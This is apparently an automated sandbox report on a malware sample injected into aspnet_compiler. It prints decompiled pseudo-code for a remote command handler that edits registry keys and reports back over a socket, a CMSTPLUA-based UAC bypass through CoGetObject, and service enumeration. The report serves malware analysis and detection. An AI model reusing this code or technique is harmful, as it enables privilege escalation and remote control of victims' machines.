                    							_v48 =  *((intOrPtr*)(E004051C3(8)));
                    							E00418009( *((intOrPtr*)(E004051C3(0xc))),  &_v48,  &_v52);
                    							E004183E7( *_t80, _v48, _v52);
                    							goto L8;
                    						}
                    					} else {
                    						_t87 = E004051C3(4);
                    						_t88 = E004051C3(3);
                    						_t89 = E004051C3(2);
                    						_t90 = E004051C3(0);
                    						 *_t87 =  *_t88;
                    						__eflags =  *_t89;
                    						E004184EE( *_t90, __edx & 0xffffff00 |  *_t89 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0 |  *_t88 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0x000000ff);
                    						L8:
                    					}
                    				} else {
                    					_t92 = E004051C3(2);
                    					_t93 = E004051C3(1);
                    					_t63 = E004051C3(0);
                    					_t148 =  *_t92 & 0x000000ff;
                    					_t177 =  *_t93;
                    					_push(_t148);
                    					_push((_t148 & 0xffffff00 |  *_t93 != 0x00000000) & 0x000000ff);
                    					_t108 = 0x473630;
                    					L18:
                    					_push( *_t63 & 0x000000ff);
                    					E00417825(_t108, _t177);
                    				}
                    				E00401FB8();
                    				E00401FB8();
                    				return 0;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0$06G$1$2$3$4$5$6$7$6G
                    • API String ID: 0-3439518097
                    • Opcode ID: 24ac2fc32beb33ce48cafe5b80d71fdfa07178e887ebd5d7dc0c99c1ba21e080
                    • Instruction ID: 33774567b1f725210584e6ae4599f2175015db0efea207338ba601142af93ff7
                    • Opcode Fuzzy Hash: 24ac2fc32beb33ce48cafe5b80d71fdfa07178e887ebd5d7dc0c99c1ba21e080
                    • Instruction Fuzzy Hash: 3461C4709183019FD304EF21D861FAB7BA49F94710F14881FF9A26B2D1DF399A49CB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E004131DA(void* __edx, void* __eflags, char _a8) {
                    				char _v36;
                    				char _v48;
                    				char _v52;
                    				void* _v60;
                    				char _v68;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				char _v88;
                    				char _v92;
                    				char _v96;
                    				char _v100;
                    				char _v104;
                    				char _v108;
                    				struct _SECURITY_ATTRIBUTES _v112;
                    				void* _v120;
                    				char _v128;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t75;
                    				void* _t86;
                    				void* _t97;
                    				void* _t99;
                    				void* _t100;
                    				void* _t102;
                    				void* _t103;
                    				void* _t111;
                    				void* _t118;
                    				void* _t119;
                    				void* _t121;
                    				void* _t125;
                    				void* _t130;
                    				void* _t136;
                    				void* _t140;
                    				void* _t145;
                    				void* _t151;
                    				void* _t153;
                    				void* _t154;
                    				void* _t156;
                    				void* _t157;
                    				void* _t163;
                    				void* _t165;
                    				void* _t166;
                    				void* _t168;
                    				void* _t174;
                    				void* _t176;
                    				void* _t177;
                    				void* _t179;
                    				void* _t184;
                    				void* _t185;
                    				long _t188;
                    				void* _t195;
                    				void* _t207;
                    				void* _t209;
                    				void* _t220;
                    				void* _t236;
                    				void* _t250;
                    				signed int _t327;
                    				void* _t330;
                    				void* _t332;
                    				void* _t337;
                    				void* _t339;
                    				void* _t341;
                    				signed int _t342;
                    				void* _t344;
                    				void* _t351;
                    				signed int _t352;
                    				void* _t355;
                    				void* _t356;
                    				void* _t357;
                    				void* _t360;
                    				void* _t365;
                    				void* _t366;
                    				void* _t368;
                    				void* _t369;
                    				void* _t371;
                    				void* _t373;
                    				void* _t374;
                    				void* _t376;
                    				void* _t378;
                    				void* _t380;
                    				void* _t385;
                    
                    				_t385 = __eflags;
                    				_t325 = __edx;
                    				_push(_t207);
                    				_t75 = E00401F8B( &_a8);
                    				_push(0xffffffff);
                    				_t330 = 4;
                    				_push(_t330);
                    				_push( &_v52);
                    				E00404182( &_a8);
                    				_t355 = (_t352 & 0xfffffff8) - 0x4c;
                    				E004020D6(_t207, _t355, __edx, _t385, 0x472ec8);
                    				_t356 = _t355 - 0x18;
                    				E004020D6(_t207, _t356, __edx, _t385,  &_v68);
                    				E0041A976( &_v108, __edx);
                    				_t357 = _t356 + 0x30;
                    				_t337 =  *_t75 - 0x35;
                    				if(_t337 == 0) {
                    					E00401F66(_t207,  &_v76);
                    					__eflags = E004021DA( &_v88) - 1;
                    					if(__eflags > 0) {
                    						L004086CB(_t207,  &_v80, _t325, E00401F8B(E00401E45( &_v88, _t325, _t351, __eflags, 1)));
                    					}
                    					E004020D6(_t207, _t357 - 0x18, _t325, __eflags, E00401E45( &_v88, _t325, _t351, __eflags, 0));
                    					_t86 = E00401EE4( &_v84);
                    					_t325 = 1;
                    					_t220 = _t86;
                    					L33:
                    					E00412FF5(_t220, _t325, _t392);
                    					L34:
                    					E00401EE9();
                    					L35:
                    					E00401E6D( &_v88, _t325);
                    					E00401FB8();
                    					E00401FB8();
                    					return 0;
                    				}
                    				_t339 = _t337 - 1;
                    				if(_t339 == 0) {
                    					_t97 = E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 2));
                    					_t99 = E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, 1));
                    					_t332 = 0;
                    					_t100 = E00401E45( &_v96, __edx, _t351, __eflags, 0);
                    					_t360 = _t357 - 0x18;
                    					E004020D6(_t207, _t360, _t325, __eflags, _t100);
                    					_t102 = E00412F64(_t207, __eflags, _t97);
                    					_t325 = _t99;
                    					_t103 = E00412D0B(_t102, _t99);
                    					_t362 = _t360 + 0x18 - 0x18;
                    					_t236 = _t360 + 0x18 - 0x18;
                    					__eflags = _t103;
                    					if(__eflags == 0) {
                    						_push("2");
                    						L29:
                    						E00402073(_t207, _t236, _t325, _t351);
                    						E00404A81(0x473450, _t325, __eflags);
                    						goto L35;
                    					}
                    					_push("1");
                    					L18:
                    					E00402073(_t207, _t236, _t325, _t351);
                    					E00404A81(0x473450, _t325, __eflags);
                    					E004020D6(_t207, _t362 - 0x18, _t325, __eflags, E00401E45( &_v120, _t325, _t351, __eflags, _t332));
                    					_t111 = E00401F8B(E00401E45( &_v128, _t325, _t351, __eflags, 1));
                    					_t325 = 0;
                    					E00412FF5(_t111, 0, __eflags);
                    					goto L35;
                    				}
                    				_t341 = _t339 - 1;
                    				if(_t341 == 0) {
                    					E0040415E(_t207,  &_v80, __edx, _t351, E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 1)));
                    					 *0x470d80 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
                    					_t118 = E00401EE4( &_v84);
                    					_t119 = E00401E45( &_v96, _t325, _t351, __eflags, 0);
                    					_t365 = _t357 - 0x18;
                    					E004020D6(_t207, _t365, _t325, __eflags, _t119);
                    					_t121 = E00412F64(_t207, __eflags, _t118);
                    					_t366 = _t365 + 0x18;
                    					__eflags =  *0x470d80(_t121);
                    					if(__eflags != 0) {
                    						_t250 = _t366 - 0x18;
                    						_push("9");
                    					} else {
                    						_t125 = E0040245C();
                    						_t342 = 2;
                    						_t207 = E00413811( &_v84, "\\", _t125 - _t342);
                    						__eflags = _t207 - 0xffffffff;
                    						if(__eflags != 0) {
                    							_t51 = _t207 + 1; // 0x1
                    							_t130 = E004330A3( ~0x00BADBAD | _t51 * _t342, _t51 * _t342 >> 0x20, _t342, __eflags);
                    							E0043E0D9(_t130, E00401EE4(E00408682( &_v84,  &_v36, 0, _t207)));
                    							E00401EE9();
                    							_t136 = E00401E45( &_v108, _t51 * _t342 >> 0x20, _t351, __eflags, 0);
                    							_t368 = _t366 - 0x18;
                    							E004020D6(_t207, _t368, _t51 * _t342 >> 0x20, __eflags, _t136);
                    							_t325 = 0;
                    							__eflags = 0;
                    							E00412FF5(_t130, 0, 0,  ~0x00BADBAD | _t51 * _t342);
                    							E004330AC(_t130);
                    							_t369 = _t368 + 0x1c;
                    						} else {
                    							_t140 = E00401E45( &_v96, _t325, _t351, __eflags, 0);
                    							_t371 = _t366 - 0x18;
                    							E004020D6(_t207, _t371, _t325, __eflags, _t140);
                    							_t325 = 0;
                    							E00412FF5(0, 0, __eflags);
                    							_t369 = _t371 + 0x18;
                    						}
                    						_t250 = _t369 - 0x18;
                    						_push("8");
                    					}
                    					L10:
                    					E00402073(_t207, _t250, _t325, _t351);
                    					E00404A81(0x473450, _t325, __eflags);
                    					goto L34;
                    				}
                    				_t344 = _t341 - 1;
                    				if(_t344 == 0) {
                    					_t145 = E0043A3AC(_t143, E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 3)));
                    					__eflags = _t145 - _t330;
                    					if(__eflags == 0) {
                    						E004351E0( &_v108, E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)), _t330);
                    						_push(_v108);
                    						_t151 = E00401F8B(E00401E45( &_v92, _t325, _t351, __eflags, 2));
                    						_t153 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 1));
                    						_t332 = 0;
                    						__eflags = 0;
                    						_t154 = E00401E45( &_v100, _t325, _t351, 0, 0);
                    						_t373 = _t357 + 0xc - 0x18;
                    						E004020D6(_t207, _t373, _t325, __eflags, _t154);
                    						_t156 = E00412F64(_t207, __eflags, _t151);
                    						_t374 = _t373 + 0x18;
                    						_t325 = _t153;
                    						_t157 = E00412BA7(_t156, _t153);
                    					} else {
                    						__eflags = _t145 - 0xb;
                    						if(__eflags == 0) {
                    							E004351E0( &_v104, E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)), 8);
                    							_t163 = E00401F8B(E00401E45( &_v92, _t325, _t351, __eflags, 2));
                    							_t165 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 1));
                    							_t332 = 0;
                    							_t166 = E00401E45( &_v100, _t325, _t351, __eflags, 0);
                    							_t376 = _t357 + 0xc - 0x18;
                    							E004020D6(_t207, _t376, _t325, __eflags, _t166);
                    							_t168 = E00412F64(_t207, __eflags, _t163);
                    							_t325 = _t165;
                    							_t157 = E00412BEB(_t168, _t165, _v104, _v100);
                    							_t374 = _t376 + 0x24;
                    						} else {
                    							_push(_t145);
                    							E00401E45( &_v92, __edx, _t351, __eflags, _t330);
                    							_push(E0040245C());
                    							_push(E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)));
                    							_t174 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 2));
                    							_t176 = E00401F8B(E00401E45( &_v100, _t325, _t351, __eflags, 1));
                    							_t332 = 0;
                    							_t177 = E00401E45( &_v104, _t325, _t351, __eflags, 0);
                    							_t378 = _t357 - 0x18;
                    							E004020D6(_t207, _t378, _t325, __eflags, _t177);
                    							_t179 = E00412F64(_t207, __eflags, _t174);
                    							_t325 = _t176;
                    							_t157 = E00412AB8(_t179, _t176);
                    							_t374 = _t378 + 0x28;
                    						}
                    					}
                    					_t362 = _t374 - 0x18;
                    					_t236 = _t374 - 0x18;
                    					__eflags = _t157;
                    					if(__eflags == 0) {
                    						_push("5");
                    						goto L29;
                    					} else {
                    						_push("4");
                    						goto L18;
                    					}
                    				}
                    				_t390 = _t344 != 1;
                    				if(_t344 != 1) {
                    					goto L35;
                    				}
                    				E0040415E(_t207,  &_v80, __edx, _t351, E00401F8B(E00401E45( &_v88, __edx, _t351, _t390, 1)));
                    				_t184 = E00401EE4( &_v84);
                    				_t185 = E00401E45( &_v96, __edx, _t351, _t390, 0);
                    				_t380 = _t357 - 0x18;
                    				E004020D6(_t207, _t380, _t325, _t390, _t185);
                    				_t188 = RegCreateKeyExW(E00412F64(_t207, _t390, _t184), 0, 0, 0, 0x20006, 0,  &_v112, 0, ??);
                    				_t349 = _t188;
                    				RegCloseKey(_v120);
                    				_t382 = _t380 + 0x18 - 0x18;
                    				_t250 = _t380 + 0x18 - 0x18;
                    				_t391 = _t188;
                    				if(_t188 != 0) {
                    					_push("7");
                    					goto L10;
                    				}
                    				E00402073(_t207, _t250, _t325, _t351, "6");
                    				_push(0x72);
                    				E00404A81(0x473450, _t325, _t391);
                    				_t209 = E0040869C( &_v108, 0x473450, 0x473450);
                    				_t392 = _t209 - 0xffffffff;
                    				if(_t209 != 0xffffffff) {
                    					_t14 = _t209 + 1; // 0x1
                    					_t327 = 2;
                    					_t195 = E004330A3( ~(__eflags > 0) | _t14 * _t327, _t14 * _t327 >> 0x20, _t349, __eflags);
                    					E0043E0D9(_t195, E00401EE4(E00408682( &_v96,  &_v48, 0, _t209)));
                    					E00401EE9();
                    					E004020D6(_t209, _t382 - 0x18, _t14 * _t327 >> 0x20, __eflags, E00401E45( &_v120, _t14 * _t327 >> 0x20, _t351, __eflags, 0));
                    					_t325 = 0;
                    					E00412FF5(_t195, 0, __eflags,  ~(__eflags > 0) | _t14 * _t327);
                    					E004330AC(_t195);
                    					goto L34;
                    				} else {
                    					E004020D6(_t209, _t382 - 0x18, _t325, _t392, E00401E45( &_v108, _t325, _t351, _t392, 0));
                    					_t325 = 0;
                    					_t220 = 0;
                    					goto L33;
                    				}
                    			}


                    APIs
                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004132AF
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004132BB
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004135B1
                    • GetProcAddress.KERNEL32(00000000), ref: 004135B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCloseCreateLibraryLoadProcsend
                    • String ID: P4G$P4G$P4G$P4G$SHDeleteKeyW$Shlwapi.dll
                    • API String ID: 2127411465-531188865
                    • Opcode ID: f96d1dcb41151ad38e22bd17a9dc74bcd221924d5de400f0a1de3e25893a3e1b
                    • Instruction ID: ee582708a1ecfa71abd053f628b5a3b7b6646190f40a2f0f90fdaba40559649c
                    • Opcode Fuzzy Hash: f96d1dcb41151ad38e22bd17a9dc74bcd221924d5de400f0a1de3e25893a3e1b
                    • Instruction Fuzzy Hash: 07E1FD72A0430067C614BB76DC579AE32A99F95718F40063FF906B71E2ED7D8B44829F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 15%
                    			E00406B71(void* __edx, void* __eflags, signed int* _a8) {
                    				signed int _v8;
                    				intOrPtr _v24;
                    				char _v44;
                    				char _v564;
                    				void* _t14;
                    				char* _t25;
                    				char* _t34;
                    
                    				_push("[+] ucmAllocateElevatedObject\n");
                    				E00406874(__eflags);
                    				_v8 = _v8 & 0x00000000;
                    				_t33 = L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}";
                    				_t34 = 0x80004005;
                    				_t14 = E0043A3D6(L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");
                    				_t38 = _t14 - 0x40;
                    				if(_t14 <= 0x40) {
                    					E00406804();
                    					_v44 = 0x24;
                    					_v24 = 4;
                    					E0043E0D9( &_v564, L"Elevation:Administrator!new:");
                    					E0043E0FB( &_v564, _t33);
                    					E00406874(_t38);
                    					_t25 =  &_v564;
                    					__imp__CoGetObject(_t25,  &_v44, 0x4644e0,  &_v8, "[+] CoGetObject\n");
                    					_t34 = _t25;
                    					_t39 = _t34;
                    					if(_t34 == 0) {
                    						_push("[+] CoGetObject SUCCESS\n");
                    					} else {
                    						_push("[-] CoGetObject FAILURE\n");
                    					}
                    					E00406874(_t39);
                    				}
                    				 *_a8 = _v8;
                    				return _t34;
                    			}


                    APIs
                    • _wcslen.LIBCMT ref: 00406B95
                    • CoGetObject.OLE32(?,00000024,004644E0,00000000), ref: 00406BF6
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Object_wcslen
                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • API String ID: 240030777-3166923314
                    • Opcode ID: 4bd05bc437bb636873ceba696c3429efc5e4b6ee891bd5b16dcec18cd7c856bf
                    • Instruction ID: 6bce67489c7e09321c684eae8049871ec0f9a08aead341868aa49f1d7bf40555
                    • Opcode Fuzzy Hash: 4bd05bc437bb636873ceba696c3429efc5e4b6ee891bd5b16dcec18cd7c856bf
                    • Instruction Fuzzy Hash: 91110A72901218A6DB10F7D5C845F8E77BCDB44714F11006BF905B2280EB7CCA54867E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E004192A3(void* __ecx, void* __edx) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t100;
                    				void* _t107;
                    				int _t108;
                    				long _t110;
                    				void* _t133;
                    				void* _t194;
                    				short** _t195;
                    				int _t196;
                    				struct _ENUM_SERVICE_STATUS* _t197;
                    				int _t198;
                    				struct _QUERY_SERVICE_CONFIG* _t201;
                    				void* _t202;
                    
                    				_t185 = __edx;
                    				_t200 = 0;
                    				_t194 = __ecx;
                    				 *((intOrPtr*)(_t202 + 0x3c)) = __ecx;
                    				_t133 = OpenSCManagerA(0, 0, 4);
                    				if(_t133 != 0) {
                    					_t135 = _t202 + 0x4c;
                    					E00401F66(_t133, _t202 + 0x4c);
                    					 *(_t202 + 0x18) = 0;
                    					 *(_t202 + 0x18) = 0;
                    					 *(_t202 + 0x28) = 0;
                    					__eflags = EnumServicesStatusW(_t133, 0x3b, 3, _t202 + 0xa4, 0, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
                    					if(__eflags != 0) {
                    						L12:
                    						CloseServiceHandle(_t133);
                    						E00403242(_t133, _t194, _t200, __eflags, _t202 + 0x4c);
                    						E00401EE9();
                    						L13:
                    						return _t194;
                    					}
                    					__eflags = GetLastError() - 0xea;
                    					if(__eflags != 0) {
                    						goto L12;
                    					}
                    					_t196 =  *(_t202 + 0x18);
                    					_push(_t196);
                    					_t200 = E0043A620(_t135);
                    					 *(_t202 + 0x30) = _t200;
                    					EnumServicesStatusW(_t133, 0x3b, 3, _t200, _t196, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
                    					_t197 = 0;
                    					 *(_t202 + 0x28) = 0;
                    					__eflags =  *(_t202 + 0x14);
                    					if(__eflags <= 0) {
                    						L11:
                    						L0043A61B(_t200);
                    						goto L12;
                    					}
                    					_t195 = _t200;
                    					_t201 =  *(_t202 + 0x2c);
                    					do {
                    						E0040323D(E004042DC(_t133, _t202 + 0x64, _t195[1], _t201, __eflags, E0040415E(_t133, _t202 + 0x38, _t185, _t201, "\t")));
                    						E00401EE9();
                    						E00401EE9();
                    						E0040323D(E004042DC(_t133, _t202 + 0x34,  *_t195, _t201, __eflags, E0040415E(_t133, _t202 + 0x68, _t195[1], _t201, "\t")));
                    						E00401EE9();
                    						E00401EE9();
                    						_t100 = E0040415E(_t133, _t202 + 0x80,  *_t195, _t201, "\t");
                    						_t185 = E0041A762(_t133, _t202 + 0x64, _t195[3]);
                    						E0040323D(E00402F85(_t202 + 0x38, _t101, _t100));
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						 *(_t202 + 0x1c) =  *(_t202 + 0x1c) & 0x00000000;
                    						_t107 = OpenServiceW(_t133,  *_t195, 1);
                    						_t160 = _t202 + 0x1c;
                    						 *(_t202 + 0x24) = _t107;
                    						_t108 = QueryServiceConfigW(_t107, _t201, 0, _t202 + 0x1c);
                    						__eflags = _t108;
                    						if(_t108 == 0) {
                    							_t110 = GetLastError();
                    							__eflags = _t110 - 0x7a;
                    							if(_t110 == 0x7a) {
                    								_t198 =  *(_t202 + 0x1c);
                    								_push(_t198);
                    								_t201 = E0043A620(_t160);
                    								QueryServiceConfigW( *(_t202 + 0x30), _t201, _t198, _t202 + 0x1c);
                    								_t199 = "\t";
                    								E0040323D(E00402FF4(_t133, _t202 + 0x80, E0041A762(_t133, _t202 + 0x34,  *_t201), _t195, _t201, __eflags, "\t"));
                    								E00401EE9();
                    								E00401EE9();
                    								E0040323D(E00402FF4(_t133, _t202 + 0x80, E0041A762(_t133, _t202 + 0x34,  *((intOrPtr*)(_t201 + 4))), _t195, _t201, __eflags, "\t"));
                    								E00401EE9();
                    								E00401EE9();
                    								_t185 = E004042DC(_t133, _t202 + 0x38,  *((intOrPtr*)(_t201 + 0xc)), _t201, __eflags, E0040415E(_t133, _t202 + 0x6c, _t119, _t201, _t199));
                    								E0040323D(E00402FF4(_t133, _t202 + 0x80, _t125, _t195, _t201, __eflags, "\n"));
                    								E00401EE9();
                    								E00401EE9();
                    								E00401EE9();
                    								L0043A61B(_t201);
                    								_t197 =  *(_t202 + 0x2c);
                    							}
                    						}
                    						CloseServiceHandle( *(_t202 + 0x24));
                    						_t197 = _t197 + 1;
                    						_t195 =  &(_t195[9]);
                    						 *(_t202 + 0x28) = _t197;
                    						__eflags = _t197 -  *(_t202 + 0x14);
                    					} while (__eflags < 0);
                    					_t194 =  *(_t202 + 0x30);
                    					_t200 =  *(_t202 + 0x2c);
                    					goto L11;
                    				}
                    				E0040415E(_t133, _t194, _t185, 0, 0x46a8f0);
                    				goto L13;
                    			}

                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00473838), ref: 004192B9
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419308
                    • GetLastError.KERNEL32 ref: 00419316
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041934E
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                    • String ID:
                    • API String ID: 3587775597-0
                    • Opcode ID: d22ff7c09391ab7c53f1240a3a0880e8a374c042e6d68de3355832e6c510aa4e
                    • Instruction ID: dba20098d3e66f28599fd06314c57e2e3311d68971aa7dbf5ba53787a6468409
                    • Opcode Fuzzy Hash: d22ff7c09391ab7c53f1240a3a0880e8a374c042e6d68de3355832e6c510aa4e
                    • Instruction Fuzzy Hash: 79816371508301ABC304EB61D8959AFB7E8FF94708F50082EF596521D2EF74EA49CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00450E90(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, char _a12) {
                    				signed int _v8;
                    				int _v12;
                    				int _v16;
                    				char _v20;
                    				signed int* _v24;
                    				short* _v28;
                    				void* __ebp;
                    				signed int _t39;
                    				void* _t45;
                    				signed int* _t46;
                    				signed int _t47;
                    				short* _t48;
                    				int _t49;
                    				short* _t56;
                    				short* _t57;
                    				short* _t58;
                    				int _t66;
                    				int _t68;
                    				short* _t72;
                    				intOrPtr _t75;
                    				void* _t77;
                    				short* _t78;
                    				intOrPtr _t85;
                    				short* _t89;
                    				short* _t92;
                    				void* _t94;
                    				short** _t102;
                    				short* _t103;
                    				signed int _t105;
                    				signed short _t108;
                    				signed int _t109;
                    				void* _t110;
                    
                    				_t39 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t39 ^ _t109;
                    				_t3 =  &_a12; // 0x44336d
                    				_t89 =  *_t3;
                    				_t105 = _a4;
                    				_v28 = _a8;
                    				_v24 = E00446A95(_t89, __ecx, __edx) + 0x50;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_t45 = E00446A95(_t89, __ecx, __edx);
                    				_t8 =  &_v20; // 0x44336d
                    				_t99 = 0;
                    				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
                    				_t92 = _t105 + 0x80;
                    				_t46 = _v24;
                    				 *_t46 = _t105;
                    				_t102 =  &(_t46[1]);
                    				 *_t102 = _t92;
                    				if(_t92 != 0 &&  *_t92 != 0) {
                    					_t85 =  *0x45e314; // 0x17
                    					E00450E33(0, 0x45e200, _t85 - 1, _t102);
                    					_t46 = _v24;
                    					_t110 = _t110 + 0xc;
                    					_t99 = 0;
                    				}
                    				_v20 = _t99;
                    				_t47 =  *_t46;
                    				if(_t47 == 0 ||  *_t47 == _t99) {
                    					_t48 =  *_t102;
                    					__eflags = _t48;
                    					if(_t48 == 0) {
                    						L19:
                    						_v20 = 0x104;
                    						_t49 = GetUserDefaultLCID();
                    						_v12 = _t49;
                    						_v16 = _t49;
                    						goto L20;
                    					}
                    					__eflags =  *_t48 - _t99;
                    					if( *_t48 == _t99) {
                    						goto L19;
                    					}
                    					_t21 =  &_v20; // 0x44336d
                    					E004507D0(_t92, _t99, _t21);
                    					_pop(_t92);
                    					goto L20;
                    				} else {
                    					_t72 =  *_t102;
                    					if(_t72 == 0 ||  *_t72 == _t99) {
                    						_t16 =  &_v20; // 0x44336d
                    						E004508B6(_t92, _t99, _t16);
                    					} else {
                    						_t15 =  &_v20; // 0x44336d
                    						E0045081B(_t92, _t99, _t15);
                    					}
                    					_pop(_t92);
                    					if(_v20 != 0) {
                    						_t103 = 0;
                    						__eflags = 0;
                    						goto L25;
                    					} else {
                    						_t75 =  *0x45e1fc; // 0x41
                    						_t77 = E00450E33(_t99, 0x45def0, _t75 - 1, _v24);
                    						_t110 = _t110 + 0xc;
                    						if(_t77 == 0) {
                    							L20:
                    							_t103 = 0;
                    							__eflags = 0;
                    							L21:
                    							if(_v20 != 0) {
                    								L25:
                    								asm("sbb esi, esi");
                    								_t108 = E00450CBC(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
                    								_pop(_t94);
                    								__eflags = _t108;
                    								if(_t108 == 0) {
                    									goto L22;
                    								}
                    								__eflags = _t108 - 0xfde8;
                    								if(_t108 == 0xfde8) {
                    									goto L22;
                    								}
                    								__eflags = _t108 - 0xfde9;
                    								if(_t108 == 0xfde9) {
                    									goto L22;
                    								}
                    								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
                    								__eflags = _t56;
                    								if(_t56 == 0) {
                    									goto L22;
                    								}
                    								_t57 = IsValidLocale(_v16, 1);
                    								__eflags = _t57;
                    								if(_t57 == 0) {
                    									goto L22;
                    								}
                    								_t58 = _v28;
                    								__eflags = _t58;
                    								if(__eflags != 0) {
                    									 *_t58 = _t108;
                    								}
                    								E004473C9(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
                    								__eflags = _t89;
                    								if(__eflags == 0) {
                    									L36:
                    									L23:
                    									return E004338BB(_v8 ^ _t109);
                    								}
                    								E004473C9(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
                    								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
                    								__eflags = _t66;
                    								if(_t66 == 0) {
                    									goto L22;
                    								}
                    								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
                    								__eflags = _t68;
                    								if(_t68 == 0) {
                    									goto L22;
                    								}
                    								E004407BF( &(_t89[0x80]), _t108,  &(_t89[0x80]), 0x10, 0xa);
                    								goto L36;
                    							}
                    							L22:
                    							goto L23;
                    						}
                    						_t78 =  *_t102;
                    						_t103 = 0;
                    						if(_t78 == 0 ||  *_t78 == 0) {
                    							E004508B6(_t92, _t99,  &_v20);
                    						} else {
                    							E0045081B(_t92, _t99,  &_v20);
                    						}
                    						_pop(_t92);
                    						goto L21;
                    					}
                    				}
                    			}

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00450F9C
                    • IsValidCodePage.KERNEL32(00000000), ref: 00450FF7
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00451006
                    • GetLocaleInfoW.KERNEL32(?,00001001,m3D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045104E
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045106D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
